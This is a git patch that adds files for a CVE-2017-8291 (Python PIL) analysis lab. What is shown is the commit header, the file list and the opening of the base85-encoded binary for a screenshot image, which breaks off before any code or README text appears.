From db10c642642bc2313258acd1dfaaf018f1263ea9 Mon Sep 17 00:00:00 2001 From: YIBYUNGYOUNG Date: Sun, 5 May 2024 02:47:20 +0900 Subject: [PATCH] =?UTF-8?q?[=EC=9D=B4=EB=B3=91=EC=98=81/yi-barrack]:=20pyt?= =?UTF-8?q?hon=20PIL-CVE-2017-8291=20=EB=B6=84=EC=84=9D=20=EC=BD=94?= =?UTF-8?q?=EB=93=9C=20=EB=B0=8F=20=EA=B2=B0=EA=B3=BC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- python/PIL-CVE-2017-8291/01.png | Bin 0 -> 36538 bytes python/PIL-CVE-2017-8291/02.png | Bin 0 -> 7229 bytes python/PIL-CVE-2017-8291/README.md | 67 +++++++++++++ python/PIL-CVE-2017-8291/app.py | 87 +++++++++++++++++ python/PIL-CVE-2017-8291/docker-compose.yml | 12 +++ python/PIL-CVE-2017-8291/poc.png | 100 ++++++++++++++++++++ 6 files changed, 266 insertions(+) create mode 100644 python/PIL-CVE-2017-8291/01.png create mode 100644 python/PIL-CVE-2017-8291/02.png create mode 100644 python/PIL-CVE-2017-8291/README.md create mode 100644 python/PIL-CVE-2017-8291/app.py create mode 100644 python/PIL-CVE-2017-8291/docker-compose.yml create mode 100644 python/PIL-CVE-2017-8291/poc.png diff --git a/python/PIL-CVE-2017-8291/01.png b/python/PIL-CVE-2017-8291/01.png new file mode 100644 index 0000000000000000000000000000000000000000..c1b4c4231bfd65b43e59dbd51d3a24e65f19b7ac GIT binary patch literal 36538 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 